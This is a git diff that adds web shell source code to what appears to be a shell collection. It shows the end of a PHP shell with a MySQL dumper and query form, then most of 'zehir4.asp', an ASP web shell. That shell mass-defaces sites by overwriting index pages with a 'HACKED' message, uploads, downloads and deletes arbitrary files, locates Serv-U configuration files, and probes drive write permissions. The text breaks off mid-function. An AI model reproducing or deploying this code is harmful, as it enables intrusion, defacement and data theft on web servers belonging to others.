+if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
+else
+{
+$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
+ob_start();
+if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
+if($table_dump=='')
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$result=mysql_query('show tables',$mysql_link);
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
+if(!$result2)$dump_file.='#error table '.$rows[0];
+else
+{
+$dump_file.='create table `'.$rows[0]."`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$rows[0].'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+}
+}
+mysql_free_result($result);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo($dump_file);
+}
+else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+else
+{
+$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link);
+if(!$result2)echo('error table '.$table_dump);
+else
+{
+if(!$to_file)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+if($to_file===false)
+{
+header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
+header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
+}
+$dump_file.="create table `{$table_dump}`(\n";
+for($j=0;$j<mysql_num_rows($result2)-1;$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
+}
+$rows2=mysql_fetch_array($result2);
+$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
+$type[$j]=$rows2[1];
+$dump_file.=");\n";
+mysql_free_result($result2);
+$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link);
+$columns=$j-1;
+for($j=0;$j<mysql_num_rows($result2);$j++)
+{
+$rows2=mysql_fetch_array($result2);
+$dump_file.='insert into `'.$table_dump.'` values (';
+for($k=0;$k<$columns;$k++)
+{
+$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
+}
+$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
+if($archive=='none')
+{
+if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
+else
+{
+echo($dump_file);
+ob_flush();
+}
+$dump_file='';
+}
+}
+mysql_free_result($result2);
+if($archive!='none')
+{
+$dump_file=gzencode($dump_file);
+header('Content-Length: '.strlen($dump_file)."\n");
+echo $dump_file;
+}else if($t_f)
+{
+fclose($t_f);
+echo('Dump for '.$db_dump.' now in '.$to_file);
+}
+}
+}
+}
+}
+break;
+}
+case 'query' :
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<table>
+<td>
+<table align=left>
+<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
+<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr>
+</table>
+</td>
+<td>
+<table>
+<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
+<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
+<input name='archive' type=radio value='none'>without arch
+<input name='archive' type=radio value='gzip' checked=true>gzip archive
+<tr><td><input type=submit name='action' value='dump'></td></tr>
+<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
+</table>
+</td>
+</table>
+<input name='page' value='mysql' type=hidden>
+<input name='action' value='query' type=submit>
+</form>
+<hr>
+<?
+$mysql_link=@mysql_connect($host,$user,$passwd);
+if(!($mysql_link)) echo('Connect error');
+else
+{
+if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;}
+//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
+$result=@mysql_query($query,$mysql_link);
+if(!($result))echo(mysql_error());
+else
+{
+echo("<table valign=top align=left>\n<tr>");
+for($i=0;$i<mysql_num_fields($result);$i++)
+echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b>  </td>');
+echo("\n</tr>\n");
+for($i=0;$i<mysql_num_rows($result);$i++)
+{
+$rows=mysql_fetch_array($result);
+echo('<tr valign=top align=left>');
+for($j=0;$j<mysql_num_fields($result);$j++)
+{
+echo('<td>'.(htmlspecialchars($rows[$j])).'</td>');
+}
+echo("</tr>\n");
+}
+echo("</table>\n");
+}
+mysql_close($mysql_link);
+}
+break;
+}
+}
+break;
+}
+}
+?>
\ No newline at end of file
diff --git a/138shell/Z/zehir4.asp.txt b/138shell/Z/zehir4.asp.txt
new file mode 100644
index 0000000..1be2420
--- /dev/null
+++ b/138shell/Z/zehir4.asp.txt
@@ -0,0 +1,1190 @@
+<%
+mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
+dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
+on error resume next
+Dim objFSO,popup
+Set objFSO = CreateObject ("Scripting.FileSystemObject")
+if Request("kuskapani")=1 then
+    Response.End
+end if
+
+
+if Request("kuskapani")=2 then
+    on error resume next
+    path = Request("path")
+    sFolder = Request("SubFolder")
+    fName = Request("FileName")
+    d1 = Request("dosya1")
+    d2 = Request("dosya2")
+    d3 = Request("dosya3")
+    d4 = Request("dosya4")
+    bg__ = Request.Form("selectColour")
+    if bg__ = "0" then bg__ = "#ffffff"
+    byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
+
+    sFolder = Replace(sFolder,"/","\")
+
+    if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
+    Set f = objFSO.GetFolder(Path)
+    Set fc = f.SubFolders
+    h__ = 0
+    f__ = 0
+    ss__ = now
+    For Each f1 In fc
+        hedef_ = replace(f1.path,"/","\")
+        if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
+        hedef__ = left(hedef_,len(hedef_)-1)
+        folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
+            if d1<>"" then d1 = true
+            if d2<>"" then d2 = true
+            if d3<>"" then d3 = true
+            if d4<>"" then d4 = true
+            on error goto 0:on error resume next
+            if fName<>"" then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
+                MyFile.write byMesaj
+            end if
+            if d1 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d2 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
+                MyFile.write byMesaj
+            end if
+            if d3 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
+                MyFile.write byMesaj
+            end if
+            if d4 then
+                Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
+                MyFile.write byMesaj
+            end if
+
+            if err<>0 then
+                response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
+                f__ = f__ + 1
+            else
+                response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
+                h__ = h__ + 1
+            end if
+    Next
+    ss___ = now
+    response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
+    response.End
+end if
+
+status = Request("status")
+path   = Request("path")
+dPath  = Request("dPath")
+arama  = Request("txArama")
+dkayit = Request("dkayit")
+table  = Request("table")
+del    = Request("del")
+islem  = Request("islem")
+strSQL = Request("strSQL")
+cf       = Request("cf")
+pathfile = request("pathfile")
+if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
+if status="" then status=2
+popup = true
+'////////////////////////////////
+Function ReadBinaryFile(FileName)
+  Const adTypeBinary = 1
+  Dim BinaryStream
+  Set BinaryStream = CreateObject("ADODB.Stream")
+  BinaryStream.Type = adTypeBinary
+  BinaryStream.Open
+  BinaryStream.LoadFromFile FileName
+  ReadBinaryFile = BinaryStream.Read
+End Function
+if status="-3" then
+    Response.Buffer=True
+    Set Fil = objFSO.GetFile(pathfile)
+
+    Response.contenttype="application/force-download"
+    Response.AddHeader "Cache-control","private"
+    Response.AddHeader "Content-Length", Fil.Size
+    Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
+
+    Response.BinaryWrite readBinaryFile(Fil.path)
+    Set f = Nothing: Set Fil = Nothing
+    response.End()
+end if
+'//////////////////////////////////
+if status="-4" then popup=false
+if status="13" then popup=false
+if status="14" then popup=false
+if status="15" then popup=false
+if status="16" then popup=false
+if status="17" then popup=false
+if status="18" then popup=false
+if status="19" then popup=false
+if status="33" then popup=false
+if status="40" then popup=false
+if status="50" then popup=false
+byMsg = request.QueryString("byMsg")
+if byMsg<>"" then response.Write byMsg
+response.Write "<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&gt;</title>"
+if popup then
+%>
+<center>
+<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakkı Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakkı Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakkı Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkı Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
